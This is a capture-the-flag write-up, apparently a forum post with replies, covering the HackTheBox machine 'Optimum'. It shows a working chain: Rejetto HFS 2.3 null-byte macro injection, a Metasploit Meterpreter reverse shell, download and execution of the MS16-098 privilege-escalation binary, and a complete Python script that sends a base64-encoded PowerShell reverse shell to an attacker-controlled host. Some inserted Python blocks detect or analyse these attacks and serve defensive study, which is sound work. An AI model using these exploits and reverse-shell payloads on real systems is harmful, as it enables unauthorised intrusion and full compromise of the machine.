Optimum write-up by Alamot

Enumeration

Port scanning

We scan the full range of TCP ports using masscan (Why masscan? Because it’s faster than nmap)

$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2017-10-10 09:58:16 GMT

 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 10.10.10.8

We found TCP port 80 open. Let’s explore it using nmap:

$ sudo nmap -A -p80 10.10.10.8

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-10 13:10 EEST
Nmap scan report for 10.10.10.8
Host is up (0.086s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We scan only the 1000 most common UDP ports using nmap because UDP scanning is very slow.

$ sudo nmap -sU --top-ports 1000 10.10.10.8

Nmap scan report for 10.10.10.8
Host is up (0.075s latency).
All 1000 scanned ports on 10.10.10.8 are open|filtered

Exploitation

So, we have found that Rejetto HttpFileServer 2.3 is running on TCP port 80. Let’s see if there are some exploits for it:

$ searchsploit rejetto 2.3 -w
----------------------------------------------------------------------- --------------------------------------------
 Exploit Title                                                         |  URL
----------------------------------------------------------------------- --------------------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload         | https://www.exploit-db.com/exploits/30850/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)    | https://www.exploit-db.com/exploits/34668/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)    | https://www.exploit-db.com/exploits/39161/
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Executi | https://www.exploit-db.com/exploits/34852/
----------------------------------------------------------------------- --------------------------------------------

Nice! There are some RCE exploits! :smiley:

An issue exists due to a poor regex in the file ParserLib.pas.

function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '{[.:]|[.:]}||', 'm!', ofs) end;

It will not handle null byte:

http://localhost:80/?search=%00{.exec|cmd.} 

So the above request will stop the regex from parsing the macro, the macro will be executed and remote code injection will happen.

The exploit basically allows you to run commands like this:

http://10.10.10.8/?search=%00{.exec|C:\windows\system32\cmd.exe /c echo hello > test.}

You can also upload/save a file like that:

http://10.10.10.8/?search=%00{.save|fullpath\filename|data.}
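As an added illustration (not part of the original write-up and not code from HFS or the exploit): the request shapes above are easy to spot in web-server logs, because a legitimate search term never contains a null byte or HFS macro syntax. The following Python 3 script decodes the query string of each request and flags the combination of %00 and a {.name|...} macro, reporting the macro syntax alone as a weaker signal. The log lines are constructed in common log format as a stand-in for whatever the real server writes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not captured from the box). Lines 1 and 3
# mimic the %00{.exec ...} and %00{.save ...} request shapes quoted above, line 4
# carries macro syntax without the null byte, the rest are benign.
SAMPLE_LOG = [
    '10.10.14.3 - - [10/Oct/2017:13:44:11 +0300] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 1534',
    '10.10.14.3 - - [10/Oct/2017:13:44:12 +0300] "GET /?search=quarterly+report HTTP/1.1" 200 812',
    '10.10.14.3 - - [10/Oct/2017:13:44:13 +0300] "GET /?search=%00{.save|C:\\tmp\\f.txt|data.} HTTP/1.1" 200 1534',
    '10.10.14.3 - - [10/Oct/2017:13:44:14 +0300] "GET /?search=%7B.exec%7Ccmd.%7D HTTP/1.1" 200 1534',
    '10.10.14.3 - - [10/Oct/2017:13:44:15 +0300] "GET /files/readme.txt HTTP/1.1" 200 220',
]

# Request line inside the quoted field of a common-log-format record.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# HFS macro syntax: {.name|arg|arg.} (the argument part is optional).
MACRO_RE = re.compile(r'\{\.(?P<name>[A-Za-z]+)(?:\|[^}]*)?\.\}')


def inspect_request(target):
    """Return the reasons a request target looks like HFS macro injection."""
    reasons = []
    query = urlsplit(target).query
    # parse_qs percent-decodes values, so %00 becomes a real NUL character.
    params = parse_qs(query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            has_null = '\x00' in value
            macro = MACRO_RE.search(value)
            if has_null and macro:
                reasons.append('%s: null byte followed by {.%s ...} macro' % (name, macro.group('name')))
            elif macro:
                reasons.append('%s: {.%s ...} macro syntax in user input' % (name, macro.group('name')))
            elif has_null:
                reasons.append('%s: embedded null byte' % name)
    return reasons


def scan_log(lines):
    """Return (line_number, reason) pairs for every suspicious request in the log."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for reason in inspect_request(m.group('target')):
            findings.append((lineno, reason))
    return findings


if __name__ == '__main__':
    for lineno, reason in scan_log(SAMPLE_LOG):
        print('line %d: %s' % (lineno, reason))
```

Decoding before matching is the point: the fourth sample line encodes the braces and the pipe, so a rule that only greps the raw request for `{.exec` would miss it.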

Using Metasploit

$ msfconsole
msf > search name:rejetto

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Rejetto HttpFileServer Remote Command Execution

msf > use exploit/windows/http/rejetto_hfs_exec 
msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(rejetto_hfs_exec) > set RPORT 80 
msf exploit(rejetto_hfs_exec) > set SRVHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set SRVPORT 60000  
msf exploit(rejetto_hfs_exec) > info

  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  20               no        Seconds to wait before terminating web server
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      10.10.10.8       yes       The target address
  RPORT      80               yes       The target port (TCP)
  SRVHOST    10.10.15.150     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    60000            yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The path of the web application
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set LPORT 60001
msf exploit(rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.150:60001 
[*] Using URL: http://10.10.15.150:60000/uT3OPJWDAW7b3s
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /uT3OPJWDAW7b3s
[*] Sending stage (205379 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.15.150:60001 -> 10.10.10.8:49264) at 2017-10-10 13:44:11 +0300
[!] Tried to delete %TEMP%\IJOurNACYIxzs.vbs, unknown result
[*] Server stopped.

Now we’ve got a low privilege shell as user Kostas:

C:\Users\kostas\Desktop> whoami
OPTIMUM\kostas

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 97
Meterpreter     : x64/windows

Privilege Escalation

Let’s search for privilege escalation exploits:

$ git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
$ cd Windows-Exploit-Suggester/
$ python2 windows-exploit-suggester.py --update

We feed windows-exploit-suggester.py an input file that contains the output of the ‘systeminfo’ command:

meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"

(Yes I know that ‘execute’ has a separate parameter -a to pass the arguments :P. But it also works like that and this scheme is actually clearer. You can also run ‘shell’ and execute ‘systeminfo > systeminfo.txt’. It’s the same thing.)

meterpreter > download systeminfo.txt

$ cat systeminfo.txt
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ££
System Boot Time:          16/10/2017, 9:20:08 ££
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 2.556 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 3.303 MB
Virtual Memory: In Use:    2.200 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

I use the --quiet option to get more compact results. If you want more info, like links to the exploits, remove it:

$ python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-2)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

Quite a few exploits. I tried some and I know that the 2nd one (MS16-098) works. The 6th one (MS16-032) works too but it’s a pain in the ■■■ if you don’t set the correct architecture from start to end. Even if you have the correct architecture -in some metasploit configurations- this exploit doesn’t work correctly.
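To make the suggester's matching concrete, here is an added Python 3 example (written for this page, not the tool's own code): it parses the systeminfo text into fields, pulls out the installed KB numbers, and reports which bulletins from a small bulletin-to-KB table have no matching hotfix, which is the list a patch-management team would work from. The table entries are the KB numbers shown in parentheses in the suggester output above; the systeminfo excerpt is a constructed cut-down version of the real dump, and the check ignores superseding updates, which the real database accounts for.

```python
import re

# Constructed systeminfo excerpt shaped like the dump above (only a few lines
# kept, and a shortened hotfix list); not the full output from the box.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2919355
                           [03]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Bulletin -> KB, taken from the numbers in parentheses in the suggester output
# above. Assumption: a bulletin counts as patched only if its own KB is listed;
# superseding updates are not tracked here.
BULLETIN_KB = {
    "MS16-098": "KB3178466",
    "MS16-075": "KB3164038",
    "MS16-032": "KB3143141",
    "MS15-051": "KB3057191",
}

# "Key:   value" lines; the non-greedy key stops at the first colon so values
# containing colons (time zone, virtual memory) still parse.
FIELD_RE = re.compile(r'^(?P<key>[^:]+?):\s*(?P<value>.*)$')
# Indented continuation lines of the Hotfix(s) field.
HOTFIX_RE = re.compile(r'^\s+\[\d+\]:\s*(KB\d+)\s*$')


def parse_systeminfo(text):
    """Turn systeminfo output into a dict of fields plus a 'hotfixes' list."""
    info = {"hotfixes": []}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            # Continuation line: only the hotfix list is collected here.
            m = HOTFIX_RE.match(line)
            if current == "Hotfix(s)" and m:
                info["hotfixes"].append(m.group(1))
            continue
        m = FIELD_RE.match(line)
        if m:
            current = m.group("key").strip()
            info[current] = m.group("value").strip()
    return info


def windows_version(info):
    """Return (major, minor, build) from the 'OS Version' field, or None."""
    m = re.match(r'(\d+)\.(\d+)\.(\d+)', info.get("OS Version", ""))
    return tuple(int(x) for x in m.groups()) if m else None


def missing_bulletins(info, table=BULLETIN_KB):
    """Bulletins whose KB is not among the installed hotfixes, sorted."""
    installed = set(info["hotfixes"])
    return sorted(b for b, kb in table.items() if kb not in installed)


if __name__ == '__main__':
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("host:", info["Host Name"], "version:", windows_version(info))
    print("installed hotfixes:", info["hotfixes"])
    print("bulletins without a matching hotfix:", missing_bulletins(info))
```

The real tool also keys its database on the identified Windows version, which is why the 'OS Version' field matters as much as the hotfix list; this example only extracts it.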

We download the -less troublesome, more reliable- exploit “Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)” from here: Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) - Windows_x86-64 local Exploit

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
meterpreter > upload 41020.exe
meterpreter > shell
C:\Users\kostas\Desktop>41020.exe

[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017

Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami

nt authority\system :D

Without Metasploit

(Look Mom! No metasploit! :stuck_out_tongue: )

We download the python script from here:

Usage is : python exploit.py RHOST RPORT
Don’t forget to change the Local IP address and Port number inside the script.

We need to host netcat (http://attackers_ip:80/nc.exe) using a web server.

$ mkdir http && cd http
$ wget https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/exe/nc.exe
$ sudo python2 -m SimpleHTTPServer 80
$ nc -lvp 60001

Make sure you have changed the local IP and port inside the script and run:

$ python2 39161.py 10.10.10.8 80 

listening on [any] 60001 ...
10.10.10.8: inverse host lookup failed: 
connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49216
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>

$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe

C:\Users\kostas\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
C:\Users\kostas\Desktop> 41020.exe

[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017

Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami

nt authority\system :D

Using a Powershell payload

Do we really need to upload nc.exe? Not really. We have powershell on the box.

#!/usr/bin/env python2
# Author: Alamot
import sys
import urllib, urllib2
from base64 import b64encode

if (len(sys.argv) < 5):
    print("usage: <RHOST> <RPORT> <LHOST> <LPORT>")
    exit()

RHOST = sys.argv[1]
RPORT = sys.argv[2]
LHOST = sys.argv[3]
LPORT = sys.argv[4]

print("RHOST="+RHOST+" RPORT="+RPORT+" LHOST="+LHOST+" LPORT="+LPORT+'\n')

payload = "$client = New-Object System.Net.Sockets.TCPClient('"+LHOST+"',"+LPORT+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

print(payload+'\n')

b64enc_command = b64encode(payload.encode('UTF-16LE')).replace('+','%2b')

url = "http://"+RHOST+":"+RPORT+"/?search=%00{.exec%7CC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe%20-EncodedCommand%20"+b64enc_command+".}"

print(url)
response = urllib2.urlopen(url)
print("\nSTATUS: "+str(response.getcode()))

Let’s run the above python script.

$ nc -lvp 60002
listening on [any] 60002 ...

$ python send_powershell_payload.py 10.10.10.8 80 LHOST 60002

connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49258
PS C:\Users\kostas\Desktop> 
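The wrapper builds the -EncodedCommand argument by encoding the script as UTF-16LE and then base64; the same transform run backwards is how a defender reads such commands out of proxy or process-creation logs. The following Python 3 script is an added example (not part of the write-up): it URL-decodes a request line or command line, finds -EncodedCommand (and its common abbreviations), decodes the script and flags the indicators seen in the payload above (TCPClient, GetStream, iex). The sample lines are constructed: one benign command, and one deliberately incomplete fragment that only carries the indicator strings.

```python
import re
import base64
from urllib.parse import unquote

# Strings from the one-liner above that rarely appear in legitimate encoded
# commands; matched case-insensitively.
INDICATORS = (
    "System.Net.Sockets.TCPClient",
    "GetStream",
    "iex ",
    "Invoke-Expression",
    "DownloadString",
)

# -EncodedCommand and the abbreviations powershell.exe accepts for it.
ENC_RE = re.compile(r'-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=%]+)', re.IGNORECASE)


def encode_command(script):
    """Same transform the wrapper uses: UTF-16LE, then base64."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def analyze(line):
    """Decode every -EncodedCommand in the line; return one record per command."""
    decoded_line = unquote(line)          # %20, %7C, %2b ... back to literal characters
    hits = []
    for m in ENC_RE.finditer(decoded_line):
        try:
            script = base64.b64decode(m.group(1)).decode('utf-16-le')
        except (ValueError, UnicodeDecodeError):
            continue                      # not a valid encoded command
        found = [i for i in INDICATORS if i.lower() in script.lower()]
        hits.append({"script": script, "indicators": found, "suspicious": bool(found)})
    return hits


# Constructed samples (not captured from the box): a benign command line, and a
# request shaped like the wrapper's URL whose script is an intentionally
# non-functional fragment built only to exercise the detector.
SAMPLE_LINES = [
    'powershell.exe -NoProfile -EncodedCommand ' + encode_command('Get-Service | Out-String'),
    '/?search=%00{.exec%7Cpowershell.exe%20-EncodedCommand%20'
    + encode_command('New-Object System.Net.Sockets.TCPClient; iex $data').replace('+', '%2b')
    + '.}',
]

if __name__ == '__main__':
    for line in SAMPLE_LINES:
        for hit in analyze(line):
            print('suspicious' if hit["suspicious"] else 'benign', hit["indicators"], repr(hit["script"]))
```

The URL-decode step matters for the HFS case: the wrapper replaces '+' with %2b so the base64 survives the query string, and the space before the argument arrives as %20, so a regex run on the raw URL would never see the -EncodedCommand token followed by whitespace.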

I really like that python wrapper for the nishang one-liner. May have to steal the idea and make it a bit more generic. A lot quicker than modifying files and typing out the IEX ■■■■ every time.

@alamot your writeups are really awesome, keep up the good work :+1:

@ippsec said:
I really like that python wrapper for the nishang one-liner. May have to steal the idea and make it a bit more generic. A lot quicker than modifying files and typing out the IEX ■■■■ every time.

Yeah that’s exactly what I was thinking. Congrats @alamot

This is by far the best Write-up I’ve read ! Awesome @alamot

@alamot - Really good Write-up! Good work!

The link to download exploit “Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)” has been changed. The latest link is https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe